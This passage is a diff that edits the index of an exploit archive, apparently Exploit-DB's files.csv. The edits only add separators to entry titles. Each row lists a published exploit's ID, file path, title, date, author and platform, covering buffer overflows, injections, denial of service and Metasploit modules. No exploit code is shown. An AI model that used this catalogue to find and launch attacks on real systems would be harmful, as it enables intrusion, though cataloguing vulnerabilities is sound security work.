Scripting",2002-09-02,"Matthew Murphy",multiple,remote,0 -21768,platforms/cgi/webapps/21768.txt,"Super Site Searcher Remote Command Execution",2002-09-03,luca.ercoli,cgi,webapps,0 +21768,platforms/cgi/webapps/21768.txt,"Super Site Searcher - Remote Command Execution",2002-09-03,luca.ercoli,cgi,webapps,0 21769,platforms/cgi/webapps/21769.txt,"Aestiva HTML/OS 2.4 - Cross-Site Scripting",2002-09-03,eax@3xT.org,cgi,webapps,0 -21770,platforms/hardware/dos/21770.c,"Cisco VPN 3000 Series Concentrator Client Authentication Denial of Service",2002-09-03,Phenoelit,hardware,dos,0 +21770,platforms/hardware/dos/21770.c,"Cisco VPN 3000 Series Concentrator Client - Authentication Denial of Service",2002-09-03,Phenoelit,hardware,dos,0 21771,platforms/unix/local/21771.c,"AFD 1.2.x - Working Directory Local Buffer Overflow",2002-09-04,eSDee,unix,local,0 -21772,platforms/unix/local/21772.pl,"HP Tru64 NLSPATH Environment Variable Local Buffer Overflow (1)",2002-07-03,stripey,unix,local,0 -21773,platforms/unix/local/21773.pl,"HP Tru64 NLSPATH Environment Variable Local Buffer Overflow (2)",2002-08-30,digitalmunition,unix,local,0 -21774,platforms/unix/local/21774.pl,"HP Tru64 4.0/5.0/5.1 _XKB_CHARSET Local Buffer Overflow",2002-07-10,stripey,unix,local,0 -21775,platforms/linux/dos/21775.c,"SWS Simple Web Server 0.0.3/0.0.4/0.1 New Line Denial of Service",2002-09-02,saman,linux,dos,0 +21772,platforms/unix/local/21772.pl,"HP Tru64 - NLSPATH Environment Variable Local Buffer Overflow (1)",2002-07-03,stripey,unix,local,0 +21773,platforms/unix/local/21773.pl,"HP Tru64 - NLSPATH Environment Variable Local Buffer Overflow (2)",2002-08-30,digitalmunition,unix,local,0 +21774,platforms/unix/local/21774.pl,"HP Tru64 4.0/5.0/5.1 - _XKB_CHARSET Local Buffer Overflow",2002-07-10,stripey,unix,local,0 +21775,platforms/linux/dos/21775.c,"SWS Simple Web Server 0.0.3/0.0.4/0.1 - New Line Denial of Service",2002-09-02,saman,linux,dos,0 21776,platforms/php/webapps/21776.txt,"PHP 4.2.3 - Header Function Script Injection",2002-09-07,"Matthew Murphy",php,webapps,0 21777,platforms/windows/remote/21777.txt,"Microsoft Internet Explorer 5 - IFrame/Frame Cross-Site/Zone Script Execution",2002-09-09,"GreyMagic Software",windows,remote,0 21778,platforms/php/webapps/21778.txt,"phpGB 1.x - SQL Injection",2002-09-09,ppp-design,php,webapps,0 @@ -19056,16 +19052,16 @@ id,file,description,date,author,platform,type,port 21780,platforms/php/webapps/21780.txt,"phpGB 1.1 - HTML Injection",2002-09-09,ppp-design,php,webapps,0 21781,platforms/windows/local/21781.c,"Trillian Instant Messaging 0.x - Credential Encryption Weakness",2002-09-09,"Coeus Group",windows,local,0 21782,platforms/multiple/dos/21782.txt,"Oracle 8.1.x/9.0/9.2 - TNS Listener Service_CurLoad Remote Denial of Service",2002-09-09,"Rapid 7",multiple,dos,0 -21783,platforms/php/webapps/21783.txt,"phpGB 1.1/1.2 PHP Code Injection",2002-09-09,ppp-design,php,webapps,0 +21783,platforms/php/webapps/21783.txt,"phpGB 1.1/1.2 - PHP Code Injection",2002-09-09,ppp-design,php,webapps,0 21784,platforms/linux/remote/21784.c,"Netris 0.3/0.4/0.5 - Remote Memory Corruption",2002-09-09,V9,linux,remote,0 21786,platforms/php/webapps/21786.php,"Blog Mod 0.1.9 - (index.php month parameter) SQL Injection",2012-10-07,WhiteCollarGroup,php,webapps,0 -21789,platforms/windows/dos/21789.txt,"Alleged Outlook Express 5/6 Link Denial of Service",2002-09-09,"Stefano Zanero",windows,dos,0 +21789,platforms/windows/dos/21789.txt,"Alleged Outlook Express 5/6 Link - Denial of Service",2002-09-09,"Stefano Zanero",windows,dos,0 21790,platforms/unix/local/21790.sh,"Cobalt Linux 6.0 - RaQ authenticate Local Privilege Escalation",2002-06-28,"Charles Stevenson",unix,local,0 -21791,platforms/hardware/dos/21791.txt,"Enterasys SSR8000 SmartSwitch Port Scan Denial of Service",2002-09-13,"Mella Marco",hardware,dos,0 +21791,platforms/hardware/dos/21791.txt,"Enterasys SSR8000 SmartSwitch - Port Scan Denial of Service",2002-09-13,"Mella Marco",hardware,dos,0 21792,platforms/windows/dos/21792.txt,"Savant Webserver 3.1 - Malformed Content-Length Denial of Service",2002-09-13,"Auriemma Luigi",windows,dos,0 21793,platforms/linux/local/21793.txt,"BRU 17.0 - XBRU Insecure Temporary File",2002-09-13,prophecy,linux,local,0 21794,platforms/windows/remote/21794.txt,"Savant Webserver 3.1 - File Disclosure",2002-09-13,"Auriemma Luigi",windows,remote,0 -21795,platforms/windows/dos/21795.pl,"PlanetWeb 1.14 Long GET Request Buffer Overflow",2002-09-16,UkR-XblP,windows,dos,0 +21795,platforms/windows/dos/21795.pl,"PlanetWeb 1.14 - Long GET Request Buffer Overflow",2002-09-16,UkR-XblP,windows,dos,0 21796,platforms/unix/local/21796.txt,"BubbleMon 1.x Kernel - Memory File Descriptor Leakage",2002-09-16,badc0ded,unix,local,0 21797,platforms/unix/local/21797.txt,"ASCPU 0.60 Kernel - Memory File Descriptor Leakage",2002-09-16,badc0ded,unix,local,0 21798,platforms/freebsd/local/21798.txt,"WMMon 1.0 b2 - Memory Character File Open File Descriptor Read",2002-09-16,badc0ded,freebsd,local,0 @@ -19074,7 +19070,7 @@ id,file,description,date,author,platform,type,port 21801,platforms/multiple/remote/21801.txt,"DB4Web 3.4/3.6 Connection Proxy",2002-09-17,"Stefan Bagdohn",multiple,remote,0 21802,platforms/cgi/webapps/21802.txt,"Lycos HTMLGear guestGear CSS HTML Injection",2002-09-17,"Matthew Murphy",cgi,webapps,0 21803,platforms/windows/remote/21803.txt,"Microsoft Internet Explorer 6 - URI Handler Restriction Circumvention",2002-09-10,"Thor Larholm",windows,remote,0 -21804,platforms/windows/remote/21804.c,"Trillian 0.6351/0.7x Identd Buffer Overflow",2002-09-18,"Lance Fitz-Herbert",windows,remote,0 +21804,platforms/windows/remote/21804.c,"Trillian 0.6351/0.7x - Identd Buffer Overflow",2002-09-18,"Lance Fitz-Herbert",windows,remote,0 21805,platforms/unix/local/21805.c,"Cisco VPN 5000 Client - Buffer Overrun (1)",2002-09-18,BrainStorm,unix,local,0 21806,platforms/unix/local/21806.c,"Cisco VPN 5000 Client - Buffer Overrun (2)",2002-09-18,zillion,unix,local,0 21807,platforms/unix/local/21807.pl,"HP Tru64/OSF1 DXTerm Buffer Overflow",2002-07-03,stripey,unix,local,0 @@ -19083,13 +19079,13 @@ id,file,description,date,author,platform,type,port 21810,platforms/windows/remote/21810.c,"Trillian 0.73/0.74 - IRC PRIVMSG Buffer Overflow",2002-09-19,"Lance Fitz-Herbert",windows,remote,0 21811,platforms/php/webapps/21811.txt,"SquirrelMail 1.2.6/1.2.7 - Multiple Cross-Site Scripting Vulnerabilities",2002-09-19,"DarC KonQuest",php,webapps,0 21812,platforms/windows/remote/21812.txt,"Microsoft Word 95/97/98/2000/2002 - INCLUDEPICTURE Document Sharing File Disclosure",2002-09-20,"Richard Edwards",windows,remote,0 -21813,platforms/windows/dos/21813.c,"Trillian 0.73/0.74 IRC JOIN Buffer Overflow",2002-09-20,"Lance Fitz-Herbert",windows,dos,0 +21813,platforms/windows/dos/21813.c,"Trillian 0.73/0.74 - IRC JOIN Buffer Overflow",2002-09-20,"Lance Fitz-Herbert",windows,dos,0 21814,platforms/linux/local/21814.c,"Alsaplayer 0.99.71 - Local Buffer Overflow",2002-09-20,zillion,linux,local,0 21815,platforms/osx/local/21815.txt,"Apple Mac OS X 10.2 - Terminal.APP Telnet Link Command Execution",2002-09-21,"Taiyo Fujii",osx,local,0 -21816,platforms/windows/dos/21816.c,"Trillian 0.725/0.73/0.74 IRC User Mode Numeric Remote Buffer Overflow",2002-09-21,"Lance Fitz-Herbert",windows,dos,0 +21816,platforms/windows/dos/21816.c,"Trillian 0.725/0.73/0.74 - IRC User Mode Numeric Remote Buffer Overflow",2002-09-21,"Lance Fitz-Herbert",windows,dos,0 21817,platforms/php/webapps/21817.txt,"Rudi Benkovic JAWMail 1.0 - Script Injection",2002-09-23,"Ulf Harnhammar",php,webapps,0 21818,platforms/linux/remote/21818.c,"Null HTTPd 0.5 - Remote Heap Overflow",2002-09-23,eSDee,linux,remote,0 -21819,platforms/windows/dos/21819.c,"Trillian 0.74 IRC Raw Messages Denial of Service",2002-09-22,"Lance Fitz-Herbert",windows,dos,0 +21819,platforms/windows/dos/21819.c,"Trillian 0.74 - IRC Raw Messages Denial of Service",2002-09-22,"Lance Fitz-Herbert",windows,dos,0 21882,platforms/unix/remote/21882.txt,"Apache Tomcat 3.2 - Directory Disclosure",2002-10-01,"HP Security",unix,remote,0 21883,platforms/windows/remote/21883.html,"Microsoft Internet Explorer 5 - Document Reference Zone Bypass",2002-10-01,"Liu Die Yu",windows,remote,0 21884,platforms/unix/local/21884.txt,"Sendmail 8.12.x - SMRSH Double Pipe Access Validation",2002-10-01,zen-parse,unix,local,0 @@ -19098,19 +19094,19 @@ id,file,description,date,author,platform,type,port 21821,platforms/windows/dos/21821.c,"Trillian 0.74 - IRC PART Message Denial of Service",2002-09-22,"Lance Fitz-Herbert",windows,dos,0 21881,platforms/bsd/local/21881.txt,"Rogue 5.3 - Local Buffer Overflow",2002-09-30,stanojr@iserver.sk,bsd,local,0 21822,platforms/multiple/webapps/21822.txt,"Endpoint Protector 4.0.4.0 - Multiple Vulnerabilities",2012-10-09,Vulnerability-Lab,multiple,webapps,0 -21823,platforms/windows/dos/21823.c,"Trillian 0.74 IRC Oversized Data Block Buffer Overflow",2002-09-22,"Lance Fitz-Herbert",windows,dos,0 +21823,platforms/windows/dos/21823.c,"Trillian 0.74 - IRC Oversized Data Block Buffer Overflow",2002-09-22,"Lance Fitz-Herbert",windows,dos,0 21824,platforms/windows/dos/21824.pl,"Arctic Torrent 1.2.3 - Memory Corruption (DoS)",2012-10-09,"Jean Pascal Pereira",windows,dos,0 21825,platforms/php/webapps/21825.txt,"phpWebsite 0.8.2 - PHP File Include",2002-09-23,"Tim Vandermeersch",php,webapps,0 21826,platforms/windows/dos/21826.pl,"FL Studio 10 Producer Edition - SEH Based Buffer Overflow PoC",2012-10-09,Dark-Puzzle,windows,dos,0 21827,platforms/hardware/remote/21827.txt,"HP Compaq Insight Manager Web Interface Cross-Site Scripting",2002-09-23,"Taylor Huff",hardware,remote,0 -21828,platforms/hardware/dos/21828.txt,"HP Procurve 4000M Switch Device Reset Denial of Service",2002-09-24,"Brook Powers",hardware,dos,0 +21828,platforms/hardware/dos/21828.txt,"HP Procurve 4000M Switch - Device Reset Denial of Service",2002-09-24,"Brook Powers",hardware,dos,0 21829,platforms/php/webapps/21829.txt,"XOOPS 1.0 RC3 - HTML Injection",2002-09-24,das@hush.com,php,webapps,0 21830,platforms/windows/dos/21830.py,"Gom Player 2.1.44.5123 - (Unicode) NULL Pointer Dereference",2012-10-09,wh1ant,windows,dos,0 21831,platforms/windows/local/21831.c,"PLIB 1.8.5 ssg/ssgParser.cxx Buffer Overflow",2012-10-09,"Andrés Gómez",windows,local,0 21835,platforms/php/webapps/21835.rb,"qdPM 7.0 - Arbitrary PHP File Upload",2012-10-10,Metasploit,php,webapps,0 21836,platforms/linux/webapps/21836.rb,"Auxilium RateMyPet - Arbitrary File Upload",2012-10-10,Metasploit,linux,webapps,0 21837,platforms/windows/remote/21837.rb,"InduSoft Web Studio - Arbitrary Upload Remote Code Execution",2012-10-10,Metasploit,windows,remote,4322 -21838,platforms/windows/remote/21838.rb,"Avaya WinPMD UniteHostRouter Buffer Overflow",2012-10-10,Metasploit,windows,remote,3217 +21838,platforms/windows/remote/21838.rb,"Avaya WinPMD UniteHostRouter - Buffer Overflow",2012-10-10,Metasploit,windows,remote,3217 21839,platforms/windows/remote/21839.rb,"NTR - ActiveX Control StopModule() Remote Code Execution",2012-10-10,Metasploit,windows,remote,0 21840,platforms/windows/remote/21840.rb,"Microsoft Internet Explorer - execCommand Use-After-Free (MS12-063)",2012-10-10,Metasploit,windows,remote,0 21841,platforms/windows/remote/21841.rb,"NTR - ActiveX Control Check() Method Buffer Overflow",2012-10-10,Metasploit,windows,remote,0 @@ -19118,15 +19114,15 @@ id,file,description,date,author,platform,type,port 21843,platforms/windows/local/21843.rb,"Windows - Escalate UAC Execute RunAs",2012-10-10,Metasploit,windows,local,0 21844,platforms/windows/local/21844.rb,"Microsoft Windows - AfdJoinLeaf Privilege Escalation (MS11-080)",2012-10-10,Metasploit,windows,local,0 21845,platforms/windows/local/21845.rb,"Windows - Escalate UAC Protection Bypass",2012-10-10,Metasploit,windows,local,0 -21846,platforms/java/remote/21846.rb,"Oracle Business Transaction Management FlashTunnelService Remote Code Execution",2012-10-10,Metasploit,java,remote,7001 +21846,platforms/java/remote/21846.rb,"Oracle Business Transaction Management FlashTunnelService - Remote Code Execution",2012-10-10,Metasploit,java,remote,7001 21847,platforms/windows/remote/21847.rb,"Avaya IP Office Customer Call Reporter - ImageUpload.ashx Remote Command Execution",2012-10-10,Metasploit,windows,remote,0 21848,platforms/linux/local/21848.rb,"Linux udev - Netlink Local Privilege Escalation",2012-10-10,Metasploit,linux,local,0 21849,platforms/unix/remote/21849.rb,"ZEN Load Balancer Filelog - Command Execution",2012-10-10,Metasploit,unix,remote,444 -21850,platforms/linux/remote/21850.rb,"Samba SetInformationPolicy AuditEventsInfo Heap Overflow",2012-10-10,Metasploit,linux,remote,0 +21850,platforms/linux/remote/21850.rb,"Samba - SetInformationPolicy AuditEventsInfo Heap Overflow",2012-10-10,Metasploit,linux,remote,0 21851,platforms/unix/remote/21851.rb,"Webmin 1.580 - /file/show.cgi Remote Command Execution",2012-10-10,Metasploit,unix,remote,10000 21852,platforms/unix/remote/21852.rb,"QNX QCONN - Remote Command Execution",2012-10-10,Metasploit,unix,remote,0 21853,platforms/unix/remote/21853.txt,"Apache Tomcat 3/4 - DefaultServlet File Disclosure",2002-09-24,"Rossen Raykov",unix,remote,0 -21854,platforms/linux/dos/21854.c,"Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service",2002-09-24,"K.C. Wong",linux,dos,0 +21854,platforms/linux/dos/21854.c,"Apache 2.0.39/40 - Oversized STDERR Buffer Denial of Service",2002-09-24,"K.C. Wong",linux,dos,0 21855,platforms/php/webapps/21855.txt,"PHP-Nuke 6.0/6.5 - Search Form Cross-Site Scripting",2002-09-24,"Mark Grimes",php,webapps,0 21856,platforms/multiple/local/21856.txt,"OpenVms 5.3/6.2/7.x - UCX POP Server Arbitrary File Modification",2002-09-25,"Mike Riley",multiple,local,0 21857,platforms/linux/remote/21857.pl,"Monkey HTTP Server 0.1.4 - File Disclosure",2002-09-25,DownBload,linux,remote,0 @@ -19149,7 +19145,7 @@ id,file,description,date,author,platform,type,port 21874,platforms/php/webapps/21874.txt,"VBulletin 2.0.3 - Calendar.php Command Execution",2002-09-27,gosper,php,webapps,0 21875,platforms/jsp/webapps/21875.txt,"Jetty 4.1 Servlet Engine - Cross-Site Scripting",2002-09-28,Skinnay,jsp,webapps,0 21876,platforms/multiple/remote/21876.txt,"SafeTP 1.46 Passive Mode Internal IP Address Revealing",2002-09-28,"Jonathan G. Lampe",multiple,remote,0 -21877,platforms/cgi/webapps/21877.txt,"EmuMail 5.0 Web Root Path Disclosure",2002-09-29,FVS,cgi,webapps,0 +21877,platforms/cgi/webapps/21877.txt,"EmuMail 5.0 - Web Root Path Disclosure",2002-09-29,FVS,cgi,webapps,0 21878,platforms/cgi/webapps/21878.txt,"EmuMail 5.0 Email Form - Script Injection",2002-09-29,FVS,cgi,webapps,0 21879,platforms/java/webapps/21879.txt,"Sun ONE Starter Kit 2.0 / ASTAware SearchDisc 3.1 - Search Engine Directory Traversal",2002-09-30,"ET LoWNOISE",java,webapps,0 21880,platforms/multiple/remote/21880.txt,"Monkey HTTP Server 0.1/0.4/0.5 - Multiple Cross-Site Scripting Vulnerabilities",2002-09-30,DownBload,multiple,remote,0 @@ -19165,49 +19161,49 @@ id,file,description,date,author,platform,type,port 21897,platforms/windows/remote/21897.txt,"SurfControl SuperScout WebFilter for windows 2000 - File Disclosure",2002-10-02,"Matt Moore",windows,remote,0 21898,platforms/windows/remote/21898.txt,"SurfControl SuperScout WebFilter for windows 2000 - SQL Injection",2002-10-02,"Matt Moore",windows,remote,0 21899,platforms/php/webapps/21899.txt,"PHPWebSite 0.8.3 - Article.php Cross-Site Scripting",2002-10-02,Sp.IC,php,webapps,0 -21900,platforms/php/webapps/21900.txt,"MySimpleNews 1.0 PHP Injection",2002-10-02,frog,php,webapps,0 +21900,platforms/php/webapps/21900.txt,"MySimpleNews 1.0 - PHP Injection",2002-10-02,frog,php,webapps,0 21901,platforms/php/webapps/21901.txt,"MySimpleNews 1.0 - Remotely Readable Administrator Password",2002-10-02,frog,php,webapps,0 21902,platforms/windows/remote/21902.c,"Microsoft Windows 2000/XP/NT 4 - Help Facility ActiveX Control Buffer Overflow",2002-10-07,ipxodi,windows,remote,0 -21903,platforms/php/webapps/21903.txt,"Michael Schatz Books 0.54/0.6 PostNuke Module Cross-Site Scripting",2002-10-03,Pistone,php,webapps,0 -21904,platforms/aix/local/21904.pl,"IBM AIX 4.3.x/5.1 ERRPT Local Buffer Overflow",2003-04-16,watercloud,aix,local,0 +21903,platforms/php/webapps/21903.txt,"Michael Schatz Books 0.54/0.6 PostNuke Module - Cross-Site Scripting",2002-10-03,Pistone,php,webapps,0 +21904,platforms/aix/local/21904.pl,"IBM AIX 4.3.x/5.1 - ERRPT Local Buffer Overflow",2003-04-16,watercloud,aix,local,0 21905,platforms/php/webapps/21905.txt,"phpMyNewsLetter 0.6.10 - Remote File Inclusion",2002-10-03,frog,php,webapps,0 21906,platforms/php/webapps/21906.txt,"phpLinkat 0.1 - Multiple Cross-Site Scripting Vulnerabilities",2002-10-04,Sp.IC,php,webapps,0 21907,platforms/windows/dos/21907.c,"Cooolsoft PowerFTP Server 2.x - Remote Denial of Service (1)",2002-10-05,Morgan,windows,dos,0 21908,platforms/windows/dos/21908.pl,"Cooolsoft PowerFTP Server 2.x - Remote Denial of Service (2)",2002-10-05,subj,windows,dos,0 21909,platforms/windows/dos/21909.txt,"Cooolsoft PowerFTP Server 2.x - Remote Denial of Service (3)",2002-10-05,p0pt4rtz,windows,dos,0 21910,platforms/windows/remote/21910.txt,"Microsoft IIS 5.0 - IDC Extension Cross-Site Scripting",2002-10-05,Roberto,windows,remote,0 -21911,platforms/multiple/dos/21911.txt,"Oracle 9i Application Server 9.0.2 Web Cache Administration Tool Denial of Service",2002-10-06,@stake,multiple,dos,0 -21912,platforms/php/webapps/21912.txt,"Killer Protection 1.0 Information Disclosure",2002-10-07,frog,php,webapps,0 +21911,platforms/multiple/dos/21911.txt,"Oracle 9i Application Server 9.0.2 Web Cache Administration Tool - Denial of Service",2002-10-06,@stake,multiple,dos,0 +21912,platforms/php/webapps/21912.txt,"Killer Protection 1.0 - Information Disclosure",2002-10-07,frog,php,webapps,0 21913,platforms/windows/remote/21913.txt,"Citrix Published Applications - Information Disclosure",2002-10-07,wire,windows,remote,0 21914,platforms/asp/webapps/21914.txt,"SSGBook 1.0 - Image Tag HTML Injection",2002-10-08,frog,asp,webapps,0 21915,platforms/windows/dos/21915.txt,"Symantec Norton Personal Firewall 2002/Kaspersky Labs Anti-Hacker 1.0/BlackIce Server Protection 3.5/BlackICE Defender 2.9 - Auto Block DoS Weakness",2002-10-08,"Yiming Gong",windows,dos,0 33403,platforms/windows/dos/33403.py,"Intellicom 1.3 - 'NetBiterConfig.exe' 'Hostname' Data Remote Stack Buffer Overflow",2009-12-14,"Ruben Santamarta ",windows,dos,0 21918,platforms/php/webapps/21918.html,"VBZoom 1.0 - SQL Injection",2002-10-08,hish,php,webapps,0 -21919,platforms/unix/remote/21919.sh,"Sendmail 8.12.6 Trojan Horse",2002-10-08,netmask,unix,remote,0 +21919,platforms/unix/remote/21919.sh,"Sendmail 8.12.6 - Trojan Horse",2002-10-08,netmask,unix,remote,0 21920,platforms/asp/webapps/21920.txt,"Microsoft Content Management Server 2001 - Cross-Site Scripting",2002-10-09,overclocking_a_la_abuela,asp,webapps,0 21921,platforms/php/webapps/21921.txt,"VBZoom 1.0 - Arbitrary File Upload",2002-10-09,hish,php,webapps,0 21922,platforms/windows/local/21922.c,"Microsoft Windows 2000/XP/NT 4 - NetDDE Privilege Escalation (1)",2002-10-09,Serus,windows,local,0 21923,platforms/windows/local/21923.c,"Microsoft Windows 2000/XP/NT 4 - NetDDE Privilege Escalation (2)",2002-10-09,Serus,windows,local,0 21924,platforms/asp/webapps/21924.txt,"SurfControl SuperScout Email Filter 3.5 - MsgError.ASP Cross-Site Scripting",2002-10-08,ken@FTU,asp,webapps,0 21925,platforms/asp/webapps/21925.txt,"SurfControl SuperScout Email Filter 3.5 - User Credential Disclosure",2002-10-08,ken@FTU,asp,webapps,0 -21926,platforms/cgi/webapps/21926.txt,"Authoria HR Suite AthCGI.EXE Cross-Site Scripting",2002-10-09,Max,cgi,webapps,0 +21926,platforms/cgi/webapps/21926.txt,"Authoria HR Suite - AthCGI.EXE Cross-Site Scripting",2002-10-09,Max,cgi,webapps,0 21927,platforms/multiple/remote/21927.rb,"Metasploit < 4.4 - pcap_log Plugin Privilege Escalation Exploit (Metasploit)",2012-10-12,0a29406d9794e4f9b30b3c5d6702c708,multiple,remote,0 21930,platforms/php/webapps/21930.txt,"PHPReactor 1.2.7 pl1 - Browse.php Cross-Site Scripting",2002-10-10,"Arab VieruZ",php,webapps,0 21929,platforms/php/webapps/21929.rb,"Project Pier - Arbitrary File Upload",2012-10-16,Metasploit,php,webapps,0 -21931,platforms/php/webapps/21931.txt,"PHPBBMod 1.3.3 PHPInfo Information Disclosure",2002-10-10,"Roland Verlander",php,webapps,0 +21931,platforms/php/webapps/21931.txt,"PHPBBMod 1.3.3 - PHPInfo Information Disclosure",2002-10-10,"Roland Verlander",php,webapps,0 21932,platforms/windows/remote/21932.pl,"Microsoft Outlook Express 5.5/6.0 - S/MIME Buffer Overflow",2002-10-10,"Noam Rathaus",windows,remote,0 21933,platforms/php/webapps/21933.txt,"PHPRank 1.8 - Add.php Cross-Site Scripting",2002-10-10,"Jedi/Sector One",php,webapps,0 21934,platforms/linux/remote/21934.txt,"KDE 3.0.x - KPF Icon Option File Disclosure",2002-10-11,"Ajay R Ramjatan",linux,remote,0 -21935,platforms/windows/dos/21935.txt,"My Web Server 1.0.1/1.0.2 Long Get Request Denial of Service",2002-10-12,"Marc Ruef",windows,dos,0 -21936,platforms/linux/remote/21936.c,"ATP httpd 0.4 Single Byte Buffer Overflow",2002-10-05,thread,linux,remote,0 +21935,platforms/windows/dos/21935.txt,"My Web Server 1.0.1/1.0.2 - Long Get Request Denial of Service",2002-10-12,"Marc Ruef",windows,dos,0 +21936,platforms/linux/remote/21936.c,"ATP httpd 0.4 - Single Byte Buffer Overflow",2002-10-05,thread,linux,remote,0 21937,platforms/linux/remote/21937.c,"ghttpd 1.4.x - Log() Function Buffer Overflow",2002-10-07,flea,linux,remote,0 21938,platforms/windows/dos/21938.txt,"TelCondex SimpleWebServer 2.0.6 - Denial of Service",2002-10-15,"Marc Ruef",windows,dos,0 21939,platforms/hardware/dos/21939.txt,"Polycom ViaVideo 2.2/3.0 - Denial of Service",2002-10-15,prophecy.net.nz,hardware,dos,0 21940,platforms/windows/remote/21940.txt,"Microsoft Internet Explorer 5/6 - Unauthorized Document Object Model Access",2002-10-15,"GreyMagic Software",windows,remote,0 21941,platforms/windows/dos/21941.txt,"Polycom 2.2/3.0 ViaVideo Buffer Overflow",2002-10-15,prophecy.net.nz,windows,dos,0 -21942,platforms/multiple/remote/21942.java,"Ingenium Learning Management System 5.1/6.1 Reversible Password Hash Weakness",2002-10-15,"Brian Enigma",multiple,remote,0 +21942,platforms/multiple/remote/21942.java,"Ingenium Learning Management System 5.1/6.1 - Reversible Password Hash Weakness",2002-10-15,"Brian Enigma",multiple,remote,0 21943,platforms/windows/dos/21943.c,"Zone Labs ZoneAlarm 3.0/3.1 - Syn Flood Denial of Service",2002-10-16,"Abraham Lincoln",windows,dos,0 -21944,platforms/hardware/remote/21944.pl,"Cisco CatOS 5.x/6.1/7.3/7.4 CiscoView HTTP Server Buffer Overflow",2002-10-16,blackangels,hardware,remote,0 +21944,platforms/hardware/remote/21944.pl,"Cisco CatOS 5.x/6.1/7.3/7.4 - CiscoView HTTP Server Buffer Overflow",2002-10-16,blackangels,hardware,remote,0 21945,platforms/linux/remote/21945.pl,"PlanetDNS PlanetWeb 1.14 - Malformed Request Remote Buffer Overflow",2002-10-17,"securma massine",linux,remote,0 21946,platforms/java/webapps/21946.txt,"VBulletin 2.0/2.2.x - Cross-Site Scripting",2002-10-18,Sp.IC,java,webapps,0 21947,platforms/unix/remote/21947.txt,"IBM Websphere Edge Server 3.6/4.0 - Cross-Site Scripting",2002-10-23,Rapid7,unix,remote,0 @@ -19219,13 +19215,13 @@ id,file,description,date,author,platform,type,port 21953,platforms/windows/dos/21953.txt,"Microsoft Windows XP/2000/NT 4 - RPC Service Denial of Service (3)",2002-10-18,Rapid7,windows,dos,0 21954,platforms/windows/dos/21954.txt,"Microsoft Windows XP/2000/NT 4 - RPC Service Denial of Service (4)",2002-10-18,anonymous,windows,dos,0 21955,platforms/windows/remote/21955.java,"AN HTTPD 1.38/1.39/1.40/1.41 - Malformed SOCKS4 Request Buffer Overflow",2002-10-21,Kanatoko,windows,remote,0 -21956,platforms/php/webapps/21956.txt,"KMMail 1.0 E-Mail HTML Injection",2002-10-21,"Ulf Harnhammar",php,webapps,0 -21957,platforms/php/webapps/21957.txt,"PHP Arena PAFileDB 1.1.3/2.1.1/3.0 Email To Friend Cross-Site Scripting",2002-10-21,ersatz,php,webapps,0 +21956,platforms/php/webapps/21956.txt,"KMMail 1.0 - E-Mail HTML Injection",2002-10-21,"Ulf Harnhammar",php,webapps,0 +21957,platforms/php/webapps/21957.txt,"PHP Arena PAFileDB 1.1.3/2.1.1/3.0 - Email To Friend Cross-Site Scripting",2002-10-21,ersatz,php,webapps,0 21958,platforms/windows/remote/21958.txt,"AOL Instant Messenger 4.8.2790 - Local File Execution",2002-10-22,"Blud Clot",windows,remote,0 21959,platforms/windows/remote/21959.txt,"Microsoft Internet Explorer 5/6 - Cached Objects Zone Bypass",2002-10-22,"GreyMagic Software",windows,remote,0 21960,platforms/php/webapps/21960.txt,"gBook 1.4 - Administrative Access",2002-10-22,frog,php,webapps,0 21961,platforms/php/webapps/21961.txt,"MyMarket 1.71 - Form_Header.php Cross-Site Scripting",2002-10-23,qber66,php,webapps,0 -21962,platforms/cgi/webapps/21962.txt,"Mojo Mail 2.7 Email Form Cross-Site Scripting",2002-10-24,"Daniel Boland",cgi,webapps,0 +21962,platforms/cgi/webapps/21962.txt,"Mojo Mail 2.7 - Email Form Cross-Site Scripting",2002-10-24,"Daniel Boland",cgi,webapps,0 21963,platforms/windows/dos/21963.pl,"SolarWinds TFTP Server Standard Edition 5.0.55 - Large UDP Packet",2002-10-24,D4rkGr3y,windows,dos,0 21964,platforms/windows/remote/21964.txt,"Solarwinds TFTP Server Standard Edition 5.0.55 - Directory Traversal",2002-10-25,"Matthew Murphy",windows,remote,0 21965,platforms/windows/dos/21965.txt,"Alt-N MDaemon 6.0.x - POP Server Buffer Overflow",2002-10-28,D4rkGr3y,windows,dos,0 @@ -19235,7 +19231,7 @@ id,file,description,date,author,platform,type,port 21969,platforms/php/webapps/21969.txt,"Benjamin Lefevre Dobermann Forum 0.x - index.php subpath Parameter Remote File Inclusion",2002-10-28,frog,php,webapps,0 21970,platforms/php/webapps/21970.txt,"Benjamin Lefevre Dobermann Forum 0.x - newtopic.php subpath Parameter Remote File Inclusion",2002-10-28,frog,php,webapps,0 21971,platforms/hardware/dos/21971.txt,"Cisco AS5350 - Universal Gateway Portscan Denial of Service",2002-10-28,"Thomas Munn",hardware,dos,0 -21972,platforms/windows/dos/21972.pl,"SmartMail Server 2.0 Closed Connection Denial of Service",2002-10-31,"securma massine",windows,dos,0 +21972,platforms/windows/dos/21972.pl,"SmartMail Server 2.0 - Closed Connection Denial of Service",2002-10-31,"securma massine",windows,dos,0 21973,platforms/windows/dos/21973.pl,"SmartMail Server 1.0 BETA 10 - Oversized Request Denial of Service",2002-10-31,"securma massine",windows,dos,0 21974,platforms/unix/remote/21974.pl,"LPRNG html2ps 1.0 - Remote Command Execution",2002-10-31,"Sebastian Krahmer",unix,remote,0 21975,platforms/hardware/dos/21975.txt,"Linksys BEFSR41 1.4x - Gozila.CGI Denial of Service",2002-11-01,"Jeep 94",hardware,dos,0 @@ -19247,7 +19243,7 @@ id,file,description,date,author,platform,type,port 21981,platforms/windows/dos/21981.txt,"Monkey HTTP Server 0.4/0.5 - Invalid POST Request Denial of Service",2002-11-02,anonymous,windows,dos,0 21982,platforms/windows/dos/21982.txt,"Northern Solutions Xeneo Web Server 2.1/2.2 - Denial of Service",2002-11-04,"Tamer Sahin",windows,dos,0 21983,platforms/hardware/remote/21983.c,"GlobalSunTech Access Point GL2422AP-0T - Information Disclosure",2002-11-04,"Tom Knienieder",hardware,remote,0 -21984,platforms/unix/dos/21984.c,"QNX 6.1 TimeCreate Local Denial of Service",2002-11-06,"Pawel Pisarczyk",unix,dos,0 +21984,platforms/unix/dos/21984.c,"QNX 6.1 - TimeCreate Local Denial of Service",2002-11-06,"Pawel Pisarczyk",unix,dos,0 21985,platforms/linux/dos/21985.txt,"Pine 4.x - From: Field Heap Corruption",2002-11-07,lsjoberg,linux,dos,0 21986,platforms/windows/dos/21986.pl,"Windows Media Player 10 - (.avi) Integer Division By Zero Crash 